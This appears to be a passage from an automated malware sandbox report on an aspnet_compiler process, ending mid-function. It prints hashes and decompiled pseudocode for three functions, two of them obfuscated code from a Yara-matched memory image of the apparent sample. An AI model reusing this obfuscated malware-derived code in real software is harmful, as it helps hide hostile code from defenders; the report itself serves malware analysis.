                                                  0x0191b972
                                                  0x0191b979
                                                  0x0191b97d
                                                  0x0191b97f
                                                  0x0191b980
                                                  0x0191b982
                                                  0x0191b984
                                                  0x00000000
                                                  0x0191b984
                                                  0x00000000
                                                  0x0191b926
                                                  0x00000000
                                                  0x0191b926

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cbe035cbf896fa2cfe2422be6e721bee737614f5e5666f88f4bf433795874965
                                                  • Instruction ID: cdb26154313bffd41f0802d2b5e3bf8ce68ab34b91fe7b119b590ed0ee877793
                                                  • Opcode Fuzzy Hash: cbe035cbf896fa2cfe2422be6e721bee737614f5e5666f88f4bf433795874965
                                                  • Instruction Fuzzy Hash: D271133224070AEFE732DF19C844F66BBFAEF44725F144528E65A876A4DB71E981CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01941002 Relevance: .2, Instructions: 198COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E01941002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1975898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x19758b0 = _t128;
								 *0x19758b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x19758b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x19758bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x19758bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x19758b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1975898 = 7;
										return _t75;
									} else {
										 *0x1975898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1975898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                                  0x01941002
                                                  0x0194100c
                                                  0x0194100f
                                                  0x01941012
                                                  0x01941018
                                                  0x00000000
                                                  0x0194102e
                                                  0x01941030
                                                  0x00000000
                                                  0x01941032
                                                  0x01941032
                                                  0x01941038
                                                  0x01941038
                                                  0x0194121e
                                                  0x019411ff
                                                  0x01941205
                                                  0x01941207
                                                  0x0194120c
                                                  0x0194120e
                                                  0x01941210
                                                  0x01941212
                                                  0x01941212
                                                  0x01941210
                                                  0x0194121c
                                                  0x0194121c
                                                  0x01941228
                                                  0x01941228
                                                  0x0194101c
                                                  0x0194101c
                                                  0x0194101c
                                                  0x0194101f
                                                  0x01941022
                                                  0x01941025
                                                  0x0194102c
                                                  0x0194102c
                                                  0x00000000
                                                  0x0194102c
                                                  0x01941027
                                                  0x0194102a
                                                  0x0194103f
                                                  0x0194103f
                                                  0x01941042
                                                  0x01941044
                                                  0x01941047
                                                  0x01941049
                                                  0x0194104c
                                                  0x0194104e
                                                  0x01941088
                                                  0x01941088
                                                  0x0194108a
                                                  0x0194108d
                                                  0x0194108f
                                                  0x01941091
                                                  0x01941091
                                                  0x01941093
                                                  0x01941095
                                                  0x01941097
                                                  0x019410c8
                                                  0x019410cb
                                                  0x019410ce
                                                  0x019410d0
                                                  0x019410f4
                                                  0x019410f4
                                                  0x019410fa
                                                  0x01941100
                                                  0x01941102
                                                  0x01941150
                                                  0x01941150
                                                  0x01941154
                                                  0x01941167
                                                  0x0194116a
                                                  0x0194116a
                                                  0x01941156
                                                  0x01941156
                                                  0x01941158
                                                  0x0194115b
                                                  0x0194115d
                                                  0x0194115f
                                                  0x0194115f
                                                  0x0194115f
                                                  0x01941162
                                                  0x01941162
                                                  0x0194116c
                                                  0x0194116f
                                                  0x01941171
                                                  0x0194117b
                                                  0x0194117b
                                                  0x0194117d
                                                  0x01941183
                                                  0x01941183
                                                  0x01941186
                                                  0x01941188
                                                  0x01941199
                                                  0x0194118a
                                                  0x0194118a
                                                  0x0194118c
                                                  0x0194118f
                                                  0x01941191
                                                  0x01941191
                                                  0x01941191
                                                  0x01941194
                                                  0x01941194
                                                  0x0194119c
                                                  0x019411a2
                                                  0x019411a8
                                                  0x019411ac
                                                  0x019411af
                                                  0x019411c7
                                                  0x019411b1
                                                  0x019411b1
                                                  0x019411b4
                                                  0x019411b7
                                                  0x019411b9
                                                  0x019411b9
                                                  0x019411b9
                                                  0x019411bc
                                                  0x019411c2
                                                  0x019411c2
                                                  0x019411cb
                                                  0x019411ce
                                                  0x019411d4
                                                  0x019411e7
                                                  0x019411ed
                                                  0x019411ef
                                                  0x00000000
                                                  0x00000000
                                                  0x019411f1
                                                  0x00000000
                                                  0x019411d6
                                                  0x019411d6
                                                  0x00000000
                                                  0x019411d6
                                                  0x019411d4
                                                  0x01941104
                                                  0x01941106
                                                  0x00000000
                                                  0x00000000
                                                  0x01941108
                                                  0x0194110c
                                                  0x0194111d
                                                  0x0194110e
                                                  0x0194110e
                                                  0x01941110
                                                  0x01941113
                                                  0x01941115
                                                  0x01941115
                                                  0x01941115
                                                  0x01941118
                                                  0x01941118
                                                  0x01941126
                                                  0x0194113a
                                                  0x0194113d
                                                  0x0194113f
                                                  0x00000000
                                                  0x01941141
                                                  0x01941141
                                                  0x00000000
                                                  0x01941141
                                                  0x0194113f
                                                  0x019410d6
                                                  0x019410d9
                                                  0x019410dd
                                                  0x019410e3
                                                  0x019410e6
                                                  0x019410e9
                                                  0x00000000
                                                  0x00000000
                                                  0x019410ee
                                                  0x019410f0
                                                  0x019410f2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x019410f2
                                                  0x00000000
                                                  0x01941099
                                                  0x01941099
                                                  0x0194109c
                                                  0x0194109c
                                                  0x0194109e
                                                  0x019410a0
                                                  0x019410b3
                                                  0x019410a2
                                                  0x019410a2
                                                  0x019410a4
                                                  0x019410a7
                                                  0x019410a9
                                                  0x019410ab
                                                  0x019410ab
                                                  0x019410ab
                                                  0x019410ae
                                                  0x019410ae
                                                  0x019410b6
                                                  0x019410b9
                                                  0x00000000
                                                  0x00000000
                                                  0x019410be
                                                  0x019410c1
                                                  0x019410c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x019410c3
                                                  0x019410c5
                                                  0x00000000
                                                  0x019410c5
                                                  0x01941097
                                                  0x01941050
                                                  0x01941053
                                                  0x01941056
                                                  0x01941059
                                                  0x0194105c
                                                  0x0194105e
                                                  0x01941060
                                                  0x01941062
                                                  0x01941064
                                                  0x01941064
                                                  0x01941062
                                                  0x01941066
                                                  0x01941069
                                                  0x0194106b
                                                  0x0194106d
                                                  0x0194106f
                                                  0x01941076
                                                  0x01941076
                                                  0x01941076
                                                  0x00000000
                                                  0x01941076
                                                  0x01941071
                                                  0x01941074
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01941074
                                                  0x01941079
                                                  0x01941079
                                                  0x0194107b
                                                  0x0194107b
                                                  0x0194107f
                                                  0x01941082
                                                  0x01941085
                                                  0x00000000
                                                  0x01941085
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e087c41b7c3c5fe48e27ccf93b8452e3e954dfd23fd9b95164c23361ea795ad1
                                                  • Instruction ID: 9f54d6cb626d5a705dada7fde2cd4cc7c686dd4676339241b0c56a95b752be06
                                                  • Opcode Fuzzy Hash: e087c41b7c3c5fe48e27ccf93b8452e3e954dfd23fd9b95164c23361ea795ad1
                                                  • Instruction Fuzzy Hash: 78718E74A00762CBEB28CF59C480A7AB7F5FF48302B65487ED99AC7640E771B990CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041BBA9 Relevance: .2, Instructions: 197COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E0041BBA9() {
				intOrPtr _t29;
				signed char _t32;
				signed char _t33;
				intOrPtr _t37;
				void* _t42;
				void* _t43;
				void* _t44;
				signed char _t49;
				signed char _t50;
				char _t55;
				signed int _t57;
				signed int _t64;
				signed int _t65;
				intOrPtr _t70;
				signed int _t89;

				 *0xcb9a0897 =  *0xcb9a0897 >> 0xed;
				asm("sbb [0x940d9032], dl");
				_t50 = _t49 ^ 0x0000003a;
				 *0x1a896982 =  *0x1a896982 | _t57;
				_t89 =  *0xdcf2270d;
				_push(0x10d6cecc);
				_t65 = _t64 &  *0x751a99b;
				asm("adc ebp, [0xa9b68dbe]");
				asm("cmpsb");
				if(_t65 > 0) {
					__ecx =  *0x1e09077e * 0x4e6;
					asm("sbb [0x4b2a9703], edi");
					__ecx = __esp;
					asm("rol byte [0xeb9fc20a], 0x89");
					__eax = __eax + 0x9c27dccb;
					asm("sbb [0x176ad9c6], dl");
					 *0x5f60211e =  *0x5f60211e ^ __esi;
					__eax = __eax |  *0x9375bb61;
					__ecx = 0x3d1fc223 +  *0x1e09077e * 0x4e6;
					 *0xda702e30 =  *0xda702e30 << 0x22;
					if( *0xda702e30 < 0) {
						__ebp = __ebp & 0xae4c7c79;
						__eax = __eax - 0xd7a5fbc4;
						if(__eax == 0) {
							__edx = __edx +  *0xb6c3167a;
							__ebx = __ebx + 0xdca1f90d;
							asm("sbb ecx, [0xa5ac1265]");
							__edx = __edx ^ 0x12b4e7ee;
							L1();
							asm("adc [0x6e562332], bh");
							__ecx = __ecx -  *0x1a0b5c81;
							_t25 = __esi;
							__esi =  *0xf1dc82cf;
							 *0xf1dc82cf = _t25;
							__edx = __edx - 1;
							__ebx = __ebx - 1;
							if(( *0x955b3539 & __ecx) < 0) {
								__esi =  *0xe93ca7d * 0x2523;
								 *0x554c1f0f =  *0x554c1f0f - __eax;
								__ah = __ah & 0x00000024;
								__esp = __esp + 1;
								__edx = __edx +  *0x6633bbd6;
							}
						}
					}
				}
				L1:
				_t29 =  *0x8a5b6f09;
				 *0xe2fbac3a =  *0xe2fbac3a << 0xd4;
				 *0xd80d5962 =  *0xd80d5962 >> 0x94;
				_t70 = _t70 +  *0xd42ffed1;
				asm("rol dword [0x49f30da1], 0xe6");
				_t89 = _t89 |  *0xcd6b907;
				asm("adc [0x27be62cc], ecx");
				_t37 =  *0x4c6af8e6;
				asm("rcl byte [0x61261908], 0xa0");
				asm("ror dword [0xef2805f5], 0x5e");
				L1();
				_t1 = _t65 | 0x3070619a;
				_t65 =  *0xd9fa7c9c;
				 *0xd9fa7c9c = _t1;
				asm("rcr byte [0x731c7df2], 0x27");
				if(_t29 > 0xd9c1ae8) {
					asm("adc edi, 0xfd9e09bb");
					asm("adc esi, [0x373123f3]");
					 *0xf3b326f4 =  *0xf3b326f4 << 0x43;
					_push(_t50 - 0x24c955fa ^  *0xad1f370d | 0x000000c9);
					 *0x8b9fc10a =  *0x8b9fc10a ^ _t57;
					 *0x89c3023b =  *0x89c3023b >> 0x5b;
					_pop(_t55);
					 *0x6afee6c2 =  *0x6afee6c2 << 0x8d;
					 *0xe6c91d8a =  *0xe6c91d8a | _t37 - 0x00000001 | 0x00000014;
					 *0x626bb1bd = _t57 +  *0x38460a9c;
					asm("adc al, 0x12");
					asm("ror dword [0xcaffddc7], 0x5c");
					_t89 = 0xa99f0094;
					 *0xe8df222b =  *0x9033af85;
					asm("adc dh, 0x12");
					_t32 =  *0x93002a0c;
					 *0x93002a0c = _t29 + 0x0000000a & 0x000000f9;
					asm("adc ch, 0xe3");
					 *0xc3c651b4 = _t55;
					asm("rcl dword [0x300e6fed], 0x51");
					_t65 = (_t65 +  *0xa5c54f2f - 0x00000001 |  *0x160f6aff) + 1;
					 *0xa0e5fbd6 =  *0xa0e5fbd6 >> 0x77;
					 *0x5f260af2 =  *0x5f260af2 >> 0xe3;
					_pop(_t42);
					_t50 = _t55 -  *0xd05ea5f4;
					 *0xf17fe60b =  *0xf17fe60b >> 0x94;
					asm("stosb");
					asm("adc [0xe66c437], eax");
					asm("sbb [0xc5e55ecc], eax");
					asm("sbb al, [0xba4179e2]");
					 *0xc5f4d7be =  *0xc5f4d7be >> 0xf0;
					_t43 = _t42 + 1;
					 *0xc40009f9 =  *0xc40009f9 + _t32;
					asm("ror dword [0xbb39d8a1], 0xcd");
					_t70 =  *0x84bf4e25;
					asm("scasb");
					_t57 = 0xa0 -  *0x3c55651d ^  *0xb6825ee4;
					if(0xa2 == 0) {
						asm("adc [0xb2faa87a], edi");
						_t57 = _t57 &  *0xbe1ee96d;
						 *0x3498282b =  *0x3498282b >> 0x49;
						_push(0xa5ed0368);
						_t50 = (_t50 ^  *0x8689a4e7) & 0x00000080;
						if( *0xe01eda6a * 0xad24 == 0) {
							 *0x7668bbfe =  *0x7668bbfe - _t50;
							_t33 = _t32 |  *0x1b953786;
							 *0x3412f934 =  *0x3412f934 << 0x2f;
							L1();
							 *0xe382fce6 =  *0xe382fce6 >> 0xb;
							 *0xb5082a30 =  *0xb5082a30 << 0xf0;
							asm("scasd");
							asm("sbb eax, 0x2958af36");
							 *0x931ecd94 =  *0x931ecd94 + _t89;
							_t44 = _t43 + 0xb4;
							asm("sbb [0x356c71a], dh");
							_t70 = _t70 + 1;
							_t50 = _t89;
							asm("adc eax, [0x9778e5f4]");
							 *0xaa6bb40b =  *0xaa6bb40b - _t44;
							asm("sbb [0x510b800e], ecx");
							asm("lodsd");
							_t57 = _t57 &  *0xb9c4fe8 ^  *0x6a3db73d;
							asm("ror byte [0x84306604], 0x3d");
							_t89 = _t89 + 1;
							 *0x12d55c86 =  *0x12d55c86 + _t44 -  *0xdb6f22f2;
							 *0x70491025 =  *0x70491025 << 0xa4;
							 *0xe1446d28 =  *0xe1446d28 << 0xd1;
							if( *0xe1446d28 < 0) {
								 *0x9033ac79 = _t33;
								_t50 = _t50 + 0x12;
							}
						}
					}
				}
				goto L1;
			}


















                                                  0x0041bbae
                                                  0x0041bbbb
                                                  0x0041bbc1
                                                  0x0041bbc4
                                                  0x0041bbe1
                                                  0x0041bbe7
                                                  0x0041bbe8
                                                  0x0041bbee
                                                  0x0041bbf4
                                                  0x0041bbf5
                                                  0x0041bbfb
                                                  0x0041bc06
                                                  0x0041bc0c
                                                  0x0041bc0d
                                                  0x0041bc14
                                                  0x0041bc19
                                                  0x0041bc1f
                                                  0x0041bc25
                                                  0x0041bc31
                                                  0x0041bc43
                                                  0x0041bc4a
                                                  0x0041bc50
                                                  0x0041bc56
                                                  0x0041bc5b
                                                  0x0041bc61
                                                  0x0041bc67
                                                  0x0041bc6d
                                                  0x0041bc73
                                                  0x0041bc79
                                                  0x0041bc84
                                                  0x0041bc8a
                                                  0x0041bc90
                                                  0x0041bc90
                                                  0x0041bc90
                                                  0x0041bc96
                                                  0x0041bc98
                                                  0x0041bc9f
                                                  0x0041bca5
                                                  0x0041bcaf
                                                  0x0041bcbb
                                                  0x0041bcbe
                                                  0x0041bcbf
                                                  0x0041bcbf
                                                  0x0041bc9f
                                                  0x0041bc5b
                                                  0x0041bc4a
                                                  0x0041b8c6
                                                  0x0041b8c6
                                                  0x0041b8cb
                                                  0x0041b8d2
                                                  0x0041b8d9
                                                  0x0041b8e0
                                                  0x0041b8e7
                                                  0x0041b8f3
                                                  0x0041b8f9
                                                  0x0041b8ff
                                                  0x0041b90c
                                                  0x0041b913
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b923
                                                  0x0041b92a
                                                  0x0041b93e
                                                  0x0041b944
                                                  0x0041b962
                                                  0x0041b96c
                                                  0x0041b96d
                                                  0x0041b985
                                                  0x0041b98c
                                                  0x0041b9a1
                                                  0x0041b9b1
                                                  0x0041b9cd
                                                  0x0041b9d3
                                                  0x0041b9de
                                                  0x0041b9e5
                                                  0x0041b9f2
                                                  0x0041b9f8
                                                  0x0041ba01
                                                  0x0041ba01
                                                  0x0041ba07
                                                  0x0041ba10
                                                  0x0041ba1e
                                                  0x0041ba25
                                                  0x0041ba26
                                                  0x0041ba37
                                                  0x0041ba4d
                                                  0x0041ba4e
                                                  0x0041ba5f
                                                  0x0041ba66
                                                  0x0041ba67
                                                  0x0041ba6d
                                                  0x0041ba73
                                                  0x0041ba79
                                                  0x0041ba80
                                                  0x0041ba81
                                                  0x0041ba87
                                                  0x0041ba8e
                                                  0x0041ba9a
                                                  0x0041ba9b
                                                  0x0041baa1
                                                  0x0041baa7
                                                  0x0041baad
                                                  0x0041bab3
                                                  0x0041baba
                                                  0x0041bac5
                                                  0x0041bad2
                                                  0x0041bade
                                                  0x0041bae4
                                                  0x0041baea
                                                  0x0041baf1
                                                  0x0041bafc
                                                  0x0041bb03
                                                  0x0041bb0a
                                                  0x0041bb0c
                                                  0x0041bb11
                                                  0x0041bb17
                                                  0x0041bb1f
                                                  0x0041bb25
                                                  0x0041bb26
                                                  0x0041bb33
                                                  0x0041bb39
                                                  0x0041bb4b
                                                  0x0041bb51
                                                  0x0041bb52
                                                  0x0041bb58
                                                  0x0041bb5f
                                                  0x0041bb72
                                                  0x0041bb7e
                                                  0x0041bb87
                                                  0x0041bb8e
                                                  0x0041bb94
                                                  0x0041bb9a
                                                  0x0041bb9d
                                                  0x0041bb8e
                                                  0x0041bad2
                                                  0x0041baa1
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 36833c7c172c48e453180b8af51b38607f76663ec5c19a488d41060a08606da1
                                                  • Instruction ID: 0204a2e70a894d0675d830a4ed3b8a936b836a0df1514fc2a7206c7ff38cdac4
                                                  • Opcode Fuzzy Hash: 36833c7c172c48e453180b8af51b38607f76663ec5c19a488d41060a08606da1
                                                  • Instruction Fuzzy Hash: 92A194729187808FE71ADF38C8CAB853FB5F752320B08025EDAA1975D6D735244ACF89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041CC0C Relevance: .2, Instructions: 182COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 41%
                                                  			E0041CC0C(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _t30;
				void* _t32;
				signed char _t38;
				signed char _t45;
				signed char _t51;
				signed char _t54;
				signed int _t56;
				signed int _t74;
				signed char _t80;

				asm("sbb bh, [0x16efa8e0]");
				_t56 = __edi + 1;
				_t44 = __ecx | 0xfd;
				_t30 = __eax & 0x5fc2ccec;
				_t51 = __edx ^  *0x3ccdc486;
				asm("sbb ecx, [0xefa8e0cc]");
				 *0x93b70016 =  *0x93b70016 << 0xc7;
				_t38 = __ebx + 0xa0 - 1;
				_t80 = _t38;
				if(_t80 < 0) {
					L1:
					_t5 = _t51;
					_t51 =  *0x939ff7b7;
					 *0x939ff7b7 = _t5;
					 *0x8f83e7b0 =  *0x8f83e7b0 >> 0x9c;
				} else {
					_pop(__edi);
					asm("sbb cl, 0x10");
					asm("adc cl, [0xb4549424]");
					asm("sbb ecx, [0x8daddd0f]");
					__eax = 0x16ef45d8;
					__esp = __esp - 1;
					if((__bh & 0x000000e0) > 0) {
						goto L1;
					} else {
						__esp = __esp ^  *0xa8008977;
						__esp = __esp +  *0x45d8a8c4;
						__ebx = __ebx |  *0x9e3f16ef;
						__esp = __esp & 0x0f9e2bc0;
						__esi = __esi |  *0x40ecb2a1;
						__ah = __ah -  *0x8f16ef88;
						_push( *0x826380d6);
						__bh =  *0xa8c4a800;
						asm("rcr dword [0x16ef45d8], 0x87");
						asm("adc [0x2bbc121f], ebp");
						asm("rcr dword [0xb2a10f9e], 0x3e");
						asm("adc ebx, 0xef8840ec");
						__edx = __edx - 0xccf0cc31;
						asm("sbb esp, [0x49395fc2]");
						__edi = __edi ^  *0xdec32e33;
						_pop( *0xe0cc32c1);
						 *0x6216efa8 =  *0x6216efa8 - __dl;
						__dl = __dl;
						 *0xd8a8c4a8 =  *0xd8a8c4a8 + __dh;
						__ebp = __ebp + 1;
						 *0xd6b616ef =  *0xd6b616ef >> 0xe;
						if(__ebp < 0) {
							goto L1;
							do {
								do {
									do {
										do {
											do {
												do {
													goto L1;
												} while (_t80 == 0);
												_t38 = _t38 &  *0xc419e217;
												asm("ror dword [0x84e5c4bb], 0xce");
											} while (_t38 != 0 ||  *0xaeb00218 >= _t51);
											 *0xe77cd173 =  *0xe77cd173 >> 0x25;
											asm("lodsb");
											_t56 = _t56 ^ 0x2f9d1616;
											asm("ror byte [0xc1ddbd1c], 0x65");
											_t38 = _t38 & 0x00000032;
											_push( *0xefa8e0cc);
											 *0x85c02c16 =  *0x85c02c16 - _t44;
											asm("sbb edi, [0xb2efca25]");
											asm("ror dword [0xefa8e0cc], 0xd");
											_t51 = _t51 & 0x00000032 | 0x45c6a616;
											_t44 = 0xc1daa919;
											asm("sbb [0xa8e0cc32], ch");
										} while (( *0xc83916ef & _t30) != 0);
										asm("rcr dword [0x997775], 0x32");
										 *0xd8a8c4a8 =  *0xd8a8c4a8 - _t30;
										_push( *0x8b7a16ef);
										_t54 = (_t51 |  *0xc68ff209) &  *0x3816efa8;
										 *0x173a7bc8 = 0xc1daa919;
										_push(_t54);
										_push(_t30 + 1);
										_push( *0xef45d88d);
										 *0x81d04116 =  *0x81d04116 - 0xc1daa919;
										_t51 = _t54 ^ 0x0000003a;
										_t45 =  *0x50405217;
										 *0x50405217 = 0xc1daa919;
										_push( *0xef45d88d);
										asm("ror dword [0x50405217], 0xce");
										asm("rcl dword [0xef45d88d], 0xc3");
										 *0x9cba1d16 = 0xdd634e75;
										_pop(_t32);
										asm("adc ch, [0xaddd0fb4]");
										asm("rcr byte [0xe7553110], 0x1f");
										 *0x453d99a1 =  *0x453d99a1 << 0xad;
										asm("ror dword [0x1db40ffd], 0x38");
										asm("adc [0xe0cc3283], edx");
										_t30 = _t32 + 0xa8;
										 *0x6d2b16ef =  *0x6d2b16ef << 0x22;
										 *0xefbe0b1c =  *0xefbe0b1c - 0x32ee16ef;
										_pop( *0xe0cc32c1);
										_t38 =  *0xbe17ff2f;
										 *0xbe17ff2f = 0x32ee16ef &  *0x8a16efa8;
										 *0xcc32bfdd =  *0xcc32bfdd | _t45;
										asm("sbb bl, 0xe0");
										_t44 = _t45 | 0x000000a8;
									} while (( *0x93ff16ef & _t38) < 0);
									 *0xe0cc32c5 = _t74;
									_t44 = _t44 ^ 0x000000a8;
